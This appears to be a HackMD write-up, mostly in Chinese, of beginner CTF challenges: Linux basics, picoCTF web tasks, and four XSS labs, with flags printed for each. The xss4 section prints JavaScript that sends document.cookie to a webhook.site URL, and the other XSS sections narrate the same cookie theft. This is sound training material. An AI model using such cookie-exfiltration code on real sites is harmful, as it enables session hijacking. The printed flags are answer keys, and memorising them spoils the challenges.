# AIS3 Junior2025 Frontend Write UP ## Linux ### challenge-1  step 1. ls輸出 step 2. 進入challenge-1 step 3. 再次ls 找到flag step 4. cat flag Flag: `AIS3{C0N9_Y0UR_F1R57_F1A9_😼}` ### challenge-2  step1. cd challenge-2 step2. ls(沒資料) step3. ls -a(找隱藏資料) step4. cat .flag Flag: AIS3{15_a1_W0N7_M155_D07_🚩} ### challenge-3  根據提示 touch 在 /tmp即可 ### challenge-4  根據提示, mv grep到challenge-5 即可 ### challenge-5    用find 炸出來 ### challenge-6   根據題目rm flag,即可得到flag --- ## picoctf(WEB) ### GET aHEAD Description Find the flag being held on this server to get ahead of the competition http://mercury.picoctf.net:34561/  GET --> HEAD就出來啦 Flag: `picoCTF{r3j3ct_th3_du4l1ty_8f878508}` ### Cookies Description Who doesn't love cookies? Try to figure out the best one. http://mercury.picoctf.net:27177/      發現cookie對應到不同cookie 測試到18時 得到flag Flag: `picoCTF{3v3ry1_l0v3s_c00k135_064663be}` ### Inspect HTML Description Can you get the flag? Additional details will be available after launching your challenge instance.  一個字: 水!!!! Flag: `picoCTF{1n5p3t0r_0f_h7ml_1fd8425b}` ### Bookmarklet Description Why search for the flag when I can make a bookmarklet to print it for me? Browse here, and find the flag!  在console 執行網頁給的 ``` javascript:(function() { var encryptedFlag = "àÒÆÞ¦È¬ëÙ£Ö�ÓÚåÛÑ¢ÕÓ�ÒËɧ�©�í"; var key = "picoctf"; var decryptedFlag = ""; for (var i = 0; i < encryptedFlag.length; i++) { decryptedFlag += String.fromCharCode((encryptedFlag.charCodeAt(i) - key.charCodeAt(i % key.length) + 256) % 256); } alert(decryptedFlag); })() ``` Flag: `picoCTF{p@g3_turn3r_6bbf8953}` ### WebDecode Description Do you know how to use the web inspector? Additional details will be available after launching your challenge instance.  在Burp Suite找 about 中的原始碼,有行很像編碼過: cGljb0NURnt3ZWJfc3VjYzNzc2Z1bGx5X2QzYzBkZWRfMWY4MzI2MTV9 經過 Base64解密,得到flag Flag: `picoCTF{web_succ3ssfully_d3c0ded_1f832615}` --- ## XSS ### xss1 url: https://chall.nckuctf.org:28124/  先用script測試  發現alarm有反應,代表xss漏洞存在  開啟webhook  插入fetch  webhook收到資料  https不行  改http  webhook收到餅乾啦! ### xss2 url: https://chall.nckuctf.org:28125/  同樣手法  看sorce code多了一個<script>  運用</script>關閉多餘的<script>  成功(接著同 xss-1)     好吃的cookie ### xss3 運用偽協定  alert成功    按下去送資料給webhook    cookie!!!!! ### xss4  先送看看  送csp測試看看?  抓! `script-src 'nonce-MjcyNjg5'` 拿講師範本改 ``` document.addEventListener("DOMContentLoaded", function () { fetch(`https://webhook.site/d00ad947-5225-4239-b3cb-e32dabdf4185?a=${document.cookie}`) const button = document.getElementById("showTimeButton"); button.addEventListener("click", function () { displayCurrentTime(); }); function displayCurrentTime() { const now = new Date(); const timeString = now.toLocaleTimeString(); document.getElementById("timeDisplay").innerText = "現在時間: " + timeString; } }); ``` py機器出去就有啦: `NCKUCTF{b453-url_w1ll_n07_f4llb4ck_70_d3f4ul7-5rc}`
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up